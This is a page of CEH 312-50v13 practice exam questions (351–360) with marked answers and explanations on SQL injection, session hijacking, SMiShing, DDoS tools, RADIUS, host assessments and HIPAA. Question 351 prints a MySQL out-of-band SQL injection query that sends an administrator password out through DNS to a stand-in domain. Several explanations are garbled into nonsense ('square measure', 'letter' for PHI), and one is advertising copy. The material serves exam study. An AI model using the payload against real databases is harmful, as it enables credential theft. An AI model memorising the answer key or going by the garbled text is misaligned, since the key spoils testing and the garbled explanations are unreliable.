EC-COUNCIL 312-50V13 Online Practice Questions and Exam Preparation

EC-COUNCIL 312-50V13 Online Questions & Answers

• Question 351:

  As an IT Security Analyst, you've been asked to review the security measures of an e-commerce website that relies on a SQL database for storing sensitive customer data. Recently, an anonymous tip has alerted you to a possible threat: a seasoned hacker who specializes in SQL Injection attacks may be targeting your system. The site already employs input validation measures to prevent basic injection attacks, and it blocks any user inputs containing suspicious patterns. However, this hacker is known to use advanced SQL Injection techniques. Given this situation, which of the following strategies would the hacker most likely adopt to bypass your security measures?

  A. The hacker could deploy an 'out-of-band' SQL Injection attack, extracting data via a different communication channel, such as DNS or HTTP requests
  B. The hacker may resort to a DDoS attack instead, attempting to crash the server and thus render the e commerce site unavailable
  C. The hacker may try to use SQL commands which are less known and less likely to be blocked by your system's security
  D. The hacker might employ a blind' SQL Injection attack, taking advantage of the application's true or false responses to extract data bit by bit
  A. The hacker could deploy an 'out-of-band' SQL Injection attack, extracting data via a different communication channel, such as DNS or HTTP requests

  ---

  Explanation

  An `out-of-band' SQL Injection attack is a type of SQL injection where the attacker does not receive a response from the attacked application on the same communication channel but instead is able to cause the application to send data to a remote endpoint that they control1. This technique can be used to bypass input validation and pattern matching measures that are based on the application's responses. The attacker can use various SQL functions or commands that trigger DNS or HTTP requests, such as load_file, copy, dbms_ldap, etc., depending on the SQL server type123. By concatenating the data they want to extract with a domain name they own, the attacker can receive the data via DNS or HTTP logs. For example, the attacker can inject the following SQL query to exfiltrate the password of the administrator user from a MySQL database:

  SELECT load_file(CONCAT('\\\\',(SELECT password FROM users WHERE username='administrator'),'.

  example.com\\\\test.txt'))

  This will cause the application to send a DNS request to the domain password.example.com, where password is the actual value of the administrator's password1.

  References:

  1: Out-of-band SQL injection | Learn AppSec | Invicti

  2: Lab: Blind SQL injection with out-of-band interaction | Web Security Academy

  3: SQLi part 6: Out-of-band SQLi | Acunetix

• Question 352:

  Taylor, a security professional, uses a tool to monitor her company's website, analyze the website's traffic, and track the geographical location of the users visiting the company's website. Which of the following tools did Taylor employ in the above scenario?

  A. WebSite Watcher
  B. web-Stat
  C. Webroot
  D. WAFW00F
  B. web-Stat

  ---

  Explanation

  Increase your web site's performance and grow! Add Web-Stat to your site (it's free!) and watch individuals act together with your pages in real time.

  Learn how individuals realize your web site. Get details concerning every visitor's path through your web site and track pages that flip browsers into consumers.

  One-click install. observe locations, in operation systems, browsers and screen sizes and obtain alerts for new guests and conversions

• Question 353:

  A penetration tester is assessing a web application that employs secure, HTTP-only cookies, regenerates session IDs upon login, and uses strict session timeout policies. To hijack a user's session without triggering the application's security defenses, which advanced technique should the tester utilize?

  A. Perform a session token prediction by analyzing session ID entropy and patterns
  B. Conduct a network-level man-in-the-middle attack to intercept and reuse session tokens
  C. Execute a Cross-Site Request Forgery (CSRF) attack to manipulate session states
  D. Implement a session fixation strategy by pre-setting a session ID before user authentication
  A. Perform a session token prediction by analyzing session ID entropy and patterns

  ---

  Explanation

  When standard protections such as HTTPS, HTTP-only flags, and session regeneration are properly implemented, CEH teaches that predictable session identifiers become one of the few remaining avenues for session hijacking. Session token prediction involves analyzing entropy, randomness, or generation patterns within session IDs to mathematically infer future or valid tokens. If the application uses weak randomization algorithms, insufficient entropy sources, or predictable sequences, attackers may generate a valid session ID without direct interception. Techniques such as MitM interception or CSRF manipulation do not bypass strong transport-layer protections and cookie restrictions. Session fixation fails because the application regenerates the session ID upon login, invalidating pre-set identifiers. Therefore, the advanced and CEH- aligned method to hijack a protected session is predicting session IDs through side-channel or pattern analysis.

• Question 354:

  Ben purchased a new smartphone and received some updates on it through the OTA method. He received two messages: one with a PIN from the network operator and another asking him to enter the PIN received from the operator. As soon as he entered the PIN, the smartphone started functioning in an abnormal manner.

  What is the type of attack performed on Ben in the above scenario?

  A. Advanced SMS phishing
  B. Bypass SSL pinning
  C. Phishing
  D. Tap 'n ghost attack
  A. Advanced SMS phishing

  ---

  Explanation

  In CEH v13 Module 17: Mobile and IoT Security, Advanced SMS Phishing (also known as SMiShing) is described as a technique where attackers impersonate trusted entities via SMS to:

  Trick users into entering authentication codes or PINs.

  Deliver malicious payloads or alter device configurations.

  Simulate OTA (Over-the-Air) provisioning messages.

  In this case:

  The attacker sends a fake OTA setup message asking for a PIN.

  Once Ben enters the PIN, the device's configuration is hijacked.

  Why Others Are Incorrect:

  B. Bypass SSL pinning: Relates to mobile app reverse engineering and traffic interception.

  C. Phishing: General term; SMS-specific variant is more accurate here.

  D. Tap `n ghost: A touch screen manipulation attack, unrelated to messaging.

  Correct answer is A. Advanced SMS phishing.

  Module 17 Mobile Threat Vectors # SMS-Based Attacks CEH iLabs: Simulating OTA Attacks and SMiShing on Android Devices

• Question 355:

  As a Certified Ethical Hacker assessing session management vulnerabilities in a secure web application using MFA, encrypted cookies, and a WAF, which technique would most effectively exploit a session management weakness while bypassing these defenses?

  A. Utilizing Session Fixation to force a victim to use a known session ID
  B. Executing a Cross-Site Request Forgery (CSRF) attack
  C. Exploiting insecure deserialization vulnerabilities for code execution
  D. Conducting Session Sidejacking using captured session tokens
  A. Utilizing Session Fixation to force a victim to use a known session ID

  ---

  Explanation

  The CEH Web Application Hacking module identifies Session Fixation as a powerful session management attack that can bypass advanced authentication controls, including MFA. In session fixation, the attacker forces the victim to authenticate using a session ID already known to the attacker . Once authentication completes, the attacker hijacks the valid session without needing credentials.

  Option A directly targets session management logic.

  Option B exploits authorization logic, not session handling.

  Option C is unrelated to session management.

  Option D is mitigated by encrypted cookies and HTTPS.

  CEH explicitly warns that applications must regenerate session IDs after authentication.

• Question 356:

  A corporation uses both hardware-based and cloud-based solutions to distribute incoming traffic and absorb DDoS attacks, ensuring legitimate requests remain unaffected. Which DDoS mitigation strategy is being utilized?

  A. Black Hole Routing
  B. Load Balancing
  C. Sinkholing
  D. Rate Limiting
  B. Load Balancing

  ---

  Explanation

  The CEH DDoS Mitigation Strategies section explains that load balancing distributes traffic across multiple servers or infrastructure components to prevent any single resource from being overwhelmed. By using hardware load balancers and cloud-based traffic distribution , organizations can:

  Absorb large volumes of attack traffic

  Maintain service availability

  Ensure legitimate users are served

  Option B is correct and directly matches CEH's definition.

  Option A drops all traffic, including legitimate requests.

  Option C focuses on traffic analysis rather than distribution.

  Option D limits traffic rather than distributing it.

  CEH strongly recommends load balancing as a core DDoS resilience mechanism.

• Question 357:

  What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stacheldraht have in common?

  A. All are hacking tools developed by the Legion of Doom
  B. All are tools that can be used not only by hackers, but also security personnel
  C. All are DDOS tools
  D. All are tools that are only effective against Windows
  E. All are tools that are only effective against Linux
  C. All are DDOS tools

  ---

  Explanation

  These tools are all Distributed Denial of Service (DDoS) attack tools that coordinate large numbers of systems (bots) to flood target networks or services:

  Trinoo UDP flood-based DDoS tool

  TFN2k (Tribe Flood Network 2000) - Supports ICMP, SYN, and other attack types

  WinTrinoo Windows variant of Trinoo

  Stacheldraht Combines features of Trinoo and TFN with encryption and auto-updating

  T-Sight DDoS control tool

  From CEH v13 Official Courseware:

  Module 9: Denial-of-Service Attacks

  CEH v13 Study Guide states:

  "These tools are classic examples of distributed DoS platforms used by attackers to launch coordinated flood attacks using compromised hosts."

  Incorrect Options:

  A: Not all tools were developed by the same group.

  B: Not typically used by defenders.

  D/E: These tools are cross-platform (some run on Linux, others on Windows).

  CEH v13 Study Guide - Module 9: Common DDoS ToolsCERT Advisory CA-2000-01: Denial-of- Service Developments

• Question 358:

  An Internet Service Provider (ISP) has a need to authenticate users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network.

  Which AAA protocol is the most likely able to handle this requirement?

  A. TACACS+
  B. DIAMETER
  C. Kerberos
  D. RADIUS
  D. RADIUS

  ---

  Explanation

  https://en.wikipedia.org/wiki/RADIUS

  Remote Authentication Dial-In User Service (RADIUS) is a networking protocol that provides centralized authentication, authorization, and accounting (AAA) management for users who connect and use a network service.

  RADIUS is a client/server protocol that runs in the application layer, and can use either TCP or UDP. Network access servers, which control access to a network, usually contain a RADIUS client component that communicates with the RADIUS server. RADIUS is often the back-end of choice for 802.1X authentication. A RADIUS server is usually a background process running on UNIX or Microsoft Windows.

  Authentication and authorization

  The user or machine sends a request to a Network Access Server (NAS) to gain access to a particular network resource using access credentials. The credentials are passed to the NAS device via the link-layer protocol-- for example, Point-to-Point Protocol (PPP) in the case of many dialup or DSL providers or posted in an HTTPS secure web form.

  In turn, the NAS sends a RADIUS Access Request message to the RADIUS server, requesting authorization to grant access via the RADIUS protocol.

  This request includes access credentials, typically in the form of username and password or security certificate provided by the user. Additionally, the request may contain other information which the NAS knows about the user, such as its network address or phone number, and information regarding the user's physical point of attachment to the NAS.

  The RADIUS server checks that the information is correct using authentication schemes such as PAP, CHAP or EAP. The user's proof of identification is verified, along with, optionally, other information related to the request, such as the user's network address or phone number, account status, and specific network service access privileges. Historically, RADIUS servers checked the user's information against a locally stored flat- file database. Modern RADIUS servers can do this or can refer to external sources--commonly SQL, Kerberos, LDAP, or Active Directory servers--to verify the user's credentials.

  The RADIUS server then returns one of three responses to the NAS:

  1) Access-Reject,

  2) Access-Challenge,

  3) Access-Accept.

  Access-Reject

  The user is unconditionally denied access to all requested network resources. Reasons may include failure to provide proof of identification or an unknown or inactive user account.

  Access-Challenge

  Requests additional information from the user such as a secondary password, PIN, token, or card. Access- Challenge is also used in more complex authentication dialogs where a secure tunnel is established between the user machine and the Radius Server in a way that the access credentials are hidden from the NAS.

  Access-Accept

  The user is granted access. Once the user is authenticated, the RADIUS server will often check that the user is authorized to use the network service requested. A given user may be allowed to use a company's wireless network, but not its VPN service, for example. Again, this information may be stored locally on the RADIUS server or may be looked up in an external source such as LDAP or Active Directory.

• Question 359:

  A newly joined employee. Janet, has been allocated an existing system used by a previous employee. Before issuing the system to Janet, it was assessed by Martin, the administrator. Martin found that there were possibilities of compromise through user directories, registries, and other system parameters. He also Identified vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. What is the type of vulnerability assessment performed by Martin?

  A. Credentialed assessment
  B. Database assessment
  C. Host-based assessment
  D. Distributed assessment
  C. Host-based assessment

  ---

  Explanation

  The host-based vulnerability assessment (VA) resolution arose from the auditors' got to periodically review systems. Arising before the net becoming common, these tools typically take an "administrator's eye" read of the setting by evaluating all of the knowledge that an administrator has at his or her disposal.

  Uses

  Host VA tools verify system configuration, user directories, file systems, registry settings, and all forms of other info on a number to gain information about it. Then, it evaluates the chance of compromise. it should also live compliance to a predefined company policy so as to satisfy an annual audit. With administrator access, the scans area unit less possible to disrupt traditional operations since the computer code has the access it has to see into the complete configuration of the system.

  What it Measures Host

  VA tools will examine the native configuration tables and registries to spot not solely apparent vulnerabilities, however additionally "dormant" vulnerabilities - those weak or misconfigured systems and settings which will be exploited when an initial entry into the setting. Host VA solutions will assess the safety settings of a user account table; the access management lists related to sensitive files or data; and specific levels of trust applied to other systems. The host VA resolution will a lot of accurately verify the extent of the danger by determinant however way any specific exploit could also be ready to get.

  Types of Vulnerability Assessment Host-based assessments are a type of security check that involve conducting a configuration-level check to identify system configurations, user directories, file systems, registry settings, and other parameters to evaluate the possibility of compromise. Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. (P.528/512)

• Question 360:

  Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients are complaining that their personal medical records are fully exposed on the Internet and someone can find them with a simple Google search. Bob's boss is very worried because of regulations that protect those data.

  Which of the following regulations is mostly violated?

  A. HIPPA/PHl
  B. Pll
  C. PCIDSS
  D. ISO 2002
  A. HIPPA/PHl

  ---

  Explanation

  PHI stands for Protected Health info. The HIPAA Privacy Rule provides federal protections for private health info held by lined entities and provides patients an array of rights with regard to that info. under HIPAA phi is considered to be any identifiable health info that's used, maintained, stored, or transmitted by a HIPAA- covered entity - a healthcare provider, health plan or health insurer, or a aid clearinghouse - or a business associate of a HIPAA-covered entity, in relation to the availability of aid or payment

  for aid services.

  It is not only past and current medical info that's considered letter under HIPAA Rules, however also future info concerning medical conditions or physical and mental health related to the provision of care or payment for care. phi is health info in any kind, together with physical records, electronic records, or spoken info.

  Therefore, letter includes health records, medical histories, lab check results, and medical bills. basically, all health info is considered letter once it includes individual identifiers. Demographic info is additionally thought of phi underneath HIPAA Rules, as square measure several common identifiers like patient names, Social Security numbers, Driver's license numbers, insurance details, and birth dates, once they square measure connected with health info.

  The eighteen identifiers that create health info letter are:

  Names

  Dates, except year

  phonephone numbers

  Geographic information

  FAX numbers

  Social Security numbers

  Email addresses

  case history numbers Account numbers

  Health arrange beneficiary numbers

  Certificate/license numbers

  Vehicle identifiers and serial numbers together with license plates

  Web URLs

  Device identifiers and serial numbers

  net protocol addresses

  Full face photos and comparable pictures

  Biometric identifiers (i.e. retinal scan, fingerprints)

  Any distinctive identifying variety or code

  One or a lot of of those identifiers turns health info into letter, and phi HIPAA Privacy Rule restrictions can then apply that limit uses and disclosures of the data. HIPAA lined entities and their business associates will ought to guarantee applicable technical, physical, and body safeguards are enforced to make sure the confidentiality, integrity, and availability of phi as stipulated within the HIPAA Security Rule.